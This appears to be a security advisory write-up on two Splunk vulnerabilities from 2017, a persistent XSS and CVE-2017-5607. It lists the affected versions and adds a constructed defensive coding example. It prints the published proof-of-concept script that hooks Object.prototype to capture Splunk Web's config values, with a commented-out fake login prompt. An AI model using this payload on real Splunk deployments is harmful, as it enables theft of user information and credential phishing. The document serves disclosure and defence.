Splunk is a big data platform that is also used in many SOCs as a SIEM tool for log analysis. Splunk is the leader in Operational Intelligence platforms. Splunk customers use it to monitor, search, analyze and visualize machine data, and the volume of data collected in Splunk is very high.
Splunk Enterprise 6.5.3, 6.2.13.1 and Splunk Light 6.5.2 address multiple vulnerabilities:
- Persistent Cross Site Scripting in Splunk Web (SPL-134841)
- Information Leakage via JavaScript (CVE-2017-5607)
Refer to this link for the details and mitigation of both vulnerabilities: https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607
Affected Products and Components
Persistent Cross Site Scripting in Splunk Web (SPL-134841)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.5.2
Affected Components: All Splunk Enterprise components running Splunk Web.
Information Leakage via JavaScript (CVE-2017-5607)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2
Affected Components: All Splunk Enterprise components.
Below is the proof-of-concept JavaScript code published in the advisory. It installs a setter for the property "$C" on Object.prototype; because the setter is inherited, it fires when Splunk Web assigns its configuration object (which includes values such as USERNAME) to the global $C, and the assigned values are exposed to the page:
<script>
// Inherited setter: fires when Splunk Web's config object is assigned to the global $C
Object.defineProperty( Object.prototype, "$C", { set:function(val){
// prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password")
for(var i in val){
alert(""+i+" "+val[i]);
}
}
});
</script>
For more details on the information leakage via JavaScript, see the original advisory: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt
The Full Disclosure post contains the exploit/PoC and explains how to reproduce it: http://seclists.org/fulldisclosure/2017/Mar/89
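To show why the setter in the PoC above sees the assignment, and what a defensive coding pattern looks like, here is an added example (not code from the advisory or from Splunk). It contrasts a loader that assigns a config object with plain assignment against one that defines it with Object.defineProperty, which creates an own data property without consulting inherited setters. The loader names, the stand-in for window and the sample config values are constructed for this example; note that the complete fix also requires not serving sensitive values in a script that other origins can include.

```javascript
// Installs a setter for "$C" on Object.prototype (as the PoC does), runs the
// given config loader against a stand-in for `window`, and returns the keys
// the setter observed. The setter is removed afterwards so nothing else is
// affected. Added example; names and values are constructed.
function observeAssignment(loader) {
  const seen = [];
  Object.defineProperty(Object.prototype, '$C', {
    configurable: true,
    set(val) { seen.push(...Object.keys(val)); },
  });
  try {
    const win = {};            // stands in for the global `window` object
    loader(win);
    return seen;
  } finally {
    delete Object.prototype.$C; // clean up the inherited setter
  }
}

// Constructed sample config; a real one would carry session-specific values.
const sampleConfig = { USERNAME: 'constructed-user', SPLUNKD_PATH: '/splunkd' };

// Vulnerable pattern: plain assignment walks the prototype chain, finds the
// inherited setter and hands it the whole object (no own property is created).
function loadConfigByAssignment(win) {
  win.$C = sampleConfig;
}

// Hardened pattern: [[DefineOwnProperty]] never consults inherited setters,
// so the object lands directly on the target as a non-writable own property.
function loadConfigByDefine(win) {
  Object.defineProperty(win, '$C', {
    value: sampleConfig, writable: false, configurable: false, enumerable: true,
  });
}
```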